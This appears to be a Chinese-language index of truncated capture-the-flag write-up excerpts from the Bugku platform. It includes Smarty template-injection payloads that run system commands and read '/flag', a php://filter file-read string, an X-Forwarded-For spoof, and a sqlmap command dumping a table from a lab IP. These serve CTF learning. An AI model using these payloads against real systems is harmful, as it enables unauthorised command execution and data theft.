Bugku-xxx二手交易市场

smarty模板注入常用的payload常用payload常用payload{ifphpinfo()}{/if}{ifsystem('ls')}{/if}{ifreadfile('/flag')}{/if}{ifshow_source('/flag')}{/if}{ifsystem('cat../../../flag')}{/if}smarty中的{if}标签中可以执行php语句随便传参可......

刚结束的ciscn，里面的要是有这么简单就好了。下载附件，是个pcap文件，打开wireshark分析一节一节看过去就找到了flag没难度的~~~......

根据题意进行unescape解码，得到js脚本，将js脚本中的代码填入输入框中点击提交就得到了flag......

没啥思路，感觉自己在刷题，，，这个考虑的是本地管理员查看源码可以知道密码是base64加密的，使用工具解码就可以了！账号是admin，从评论里知道的...打开burp抓包，修改X-Forwarded-For:127.0.0.1即可......

没啥思路，在这个网站上不能右键弹出属性框，F12查看也没啥可看的，所以就去看了看评论，大概的套路有了，就只有实践了先安装dirsearch：https://github.com/maurosoria/dirsearch进入GitHub下载zip包，我拖到了kali里面安装，因为在wndows中解压输入命令就弹出dirsearch.py的文本文件，做完......

这个很简单！！！看了查看器，里面啥也没有，就看看网络，点开发现了flag......

打开页面之后一直在刷新（也可以说是窗口重新加载？）最近刚学了js脚本，浏览器右键检查源代码，发现有一个script一直在重载，在firefox浏览器中禁用js后，去网络里看加载页面源代码，然后就找到了flagfirefox禁用js的方式：先在地址栏输入about:config然后在搜索框中输入Javascript看到javas......

php://filter/read=convert.base64-encode/resource=index.php......

这是sql的注入题我自己的sql注入学的还不是很到位，这个题目有很学习的意味：；；第一个是通过sqlmap的注入的方式：python3.\sqlmap.py-u"http://114.67.246.176:18696/index.php"--methodPOST--data"id=1"-Dskctf-Tfl4g-Cskctf_flag--dumppythonsqlmap.py-uurl--......

这个题目的考察的还是代码审计，还有eval函数的利用，当然还有对过滤这些因素的审查。代码块就直接放下面了：先刷题，改天再回过来看。<?php    error_reporting(0);    require __DIR__.'/flag.php';    $exam = 'return\''.sha1(time()).'\';';    if (!i......